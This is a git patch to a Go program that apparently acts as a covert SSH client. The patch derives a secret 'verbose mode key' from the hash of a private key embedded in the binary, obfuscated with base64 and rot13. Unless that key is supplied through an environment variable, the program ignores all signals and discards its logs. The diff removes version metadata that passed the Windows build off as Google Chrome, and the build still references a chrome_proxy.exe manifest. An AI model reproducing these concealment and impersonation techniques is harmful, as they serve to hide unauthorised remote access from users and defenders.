From 6c278f1602a1e3500a56cbf3f468bcd863a7a039 Mon Sep 17 00:00:00 2001 From: Jerry Jacobs Date: Wed, 31 Jul 2024 21:03:54 +0200 Subject: [PATCH] In release build derive VMK from SSH private key when cfg.VerboseModeKey is unset --- Makefile | 2 ++ config.go | 3 ++- main.go | 6 +++--- main_release.go | 26 +++++++++++++++++++------- system.go | 2 +- system_darwin.go | 2 +- system_linux.go | 2 +- system_windows.go | 3 ++- versioninfo.json | 22 ++++++++++------------ 9 files changed, 41 insertions(+), 27 deletions(-) diff --git a/Makefile b/Makefile index 319d4dd..a1b3f7f 100644 --- a/Makefile +++ b/Makefile @@ -74,6 +74,8 @@ resources/ssh_private_key.base64.rot13: resources/ssh_private_key.base64 resources/ssh_private_key.base64.rot13.github: resources/ssh_private_key.base64.rot13 base64 -i $< -o $@ +vmk: resources/ssh_private_key + shasum -a 256 $< fmt: gofmt -w *.go diff --git a/config.go b/config.go index 4b307b8..a1df67e 100644 --- a/config.go +++ b/config.go @@ -9,7 +9,8 @@ type config struct { // verbose mode is force enabled. The key is read from the "VMK" environment // variable at startup. // - // NOTE: This could be the sha256sum hex encoded string of the SSHPrivateKeyFile + // When not set during build, in release mode the SHA256-hex fingerprint is + // derived from the PEM SSH private key. VerboseModeKey string // SSH server user name diff --git a/main.go b/main.go index 65c04c1..3ee3803 100644 --- a/main.go +++ b/main.go @@ -16,9 +16,9 @@ var sshfpResolver *sshfp.Resolver func secureEraseResourceSSHPrivateKey() { log.Println("ERASING SSH private key") -// for i := range resourceSSHPrivateKey { -// resourceSSHPrivateKey[i] = 0 -// } + // for i := range resourceSSHPrivateKey { + // resourceSSHPrivateKey[i] = 0 + // } } type SSHHostPublicKeyFetcher struct { diff --git a/main_release.go b/main_release.go index 01ea50e..b39a35f 100644 --- a/main_release.go +++ b/main_release.go @@ -4,14 +4,16 @@ package main import ( + "crypto/sha256" _ "embed" + "encoding/base64" + "encoding/hex" + "github.com/awnumar/memguard" + "io/ioutil" + "log" "os" "os/user" "path/filepath" - "log" - "io/ioutil" - "encoding/base64" - "github.com/awnumar/memguard" ) //go:embed resources/ssh_private_key.base64.rot13 @@ -42,7 +44,7 @@ func resourcesPurge() { memguard.Purge() } -func resourceSSHPrivateKeyUnpack() { +func resourceSSHPrivateKeyUnpack() string { resourceSSHPrivateKeyBase64 := rot13String(resourceSSHPrivateKeyBase64Rot13) decodedData, err := base64.StdEncoding.DecodeString(resourceSSHPrivateKeyBase64) @@ -52,6 +54,11 @@ func resourceSSHPrivateKeyUnpack() { resourceSSHPrivateKeyMemguardBuffer = memguard.NewBufferFromBytes(decodedData) resourceSSHPrivateKey = resourceSSHPrivateKeyMemguardBuffer.String() + + shasum := sha256.New() + shasum.Write([]byte(resourceSSHPrivateKey)) + + return hex.EncodeToString(shasum.Sum(nil)) } func resourceSSHPrivateKeyDestroy() { @@ -66,7 +73,12 @@ func init() { // Safely terminate in case of an interrupt signal memguard.CatchInterrupt() - var logFile string + var logFile string + + sshPrivateKeySHA256Sum := resourceSSHPrivateKeyUnpack() + if cfg.VerboseModeKey == "" { + cfg.VerboseModeKey = sshPrivateKeySHA256Sum + } dontSilenceKey := os.Getenv("VMK") if dontSilenceKey == cfg.VerboseModeKey { @@ -75,6 +87,7 @@ func init() { systemIgnoreAllSignals() logFile = os.DevNull } + // TODO: memguard at this point the cfg.VerboseModeKey ? if logFile == "homedir" { logFile = os.DevNull @@ -104,5 +117,4 @@ func init() { } systemRouteAllLogging(logFile) - resourceSSHPrivateKeyUnpack() } diff --git a/system.go b/system.go index beeea55..97b086f 100644 --- a/system.go +++ b/system.go @@ -1,8 +1,8 @@ package main import ( - "log" "io" + "log" "os" "os/signal" "path/filepath" diff --git a/system_darwin.go b/system_darwin.go index 2374007..178584f 100644 --- a/system_darwin.go +++ b/system_darwin.go @@ -1,4 +1,4 @@ -//go:build darwin +//go:build darwin // +build darwin package main diff --git a/system_linux.go b/system_linux.go index 5e4deb0..fe2004f 100644 --- a/system_linux.go +++ b/system_linux.go @@ -5,8 +5,8 @@ package main import ( "log" - "syscall" "strings" + "syscall" ) func systemGetWINEVersion() string { diff --git a/system_windows.go b/system_windows.go index dd9a20f..ef0ed27 100644 --- a/system_windows.go +++ b/system_windows.go @@ -1,7 +1,8 @@ //go:build windows -//go:generate goversioninfo -manifest=resources/chrome_proxy.exe.manifest -64 // +build windows +//go:generate goversioninfo -manifest=resources/chrome_proxy.exe.manifest -64 + package main import ( diff --git a/versioninfo.json b/versioninfo.json index 0828420..6471f82 100644 --- a/versioninfo.json +++ b/versioninfo.json @@ -19,18 +19,16 @@ "FileSubType": "00" }, "StringFileInfo": { - "CompanyName": "Google LLC", - "FileDescription": "Google Chrome", - "FileVersion": "127.0.6533.73", - "InternalName": "chrome_proxy", - "LegalCopyright": "Copyright 2024 Google LLC. All rights reserved.", - "OriginalFilename": "chrome_proxy.exe", - "ProductName": "Google Chrome", - "ProductVersion": "127.0.6533.73", - "CompanyShortName": "Google", - "ProductShortName": "Chrome", - "LastChange": "b59f345ebd6c6bd0b5eb2a715334e912b514773d-refs/branch-heads/6533@{#1761}", - "Official Build": "1" + "CompanyName": "", + "FileDescription": "", + "FileVersion": "", + "InternalName": "", + "LegalCopyright": "", + "OriginalFilename": "", + "ProductName": "", + "ProductVersion": "", + "CompanyShortName": "", + "ProductShortName": "" }, "VarFileInfo": { "Translation": {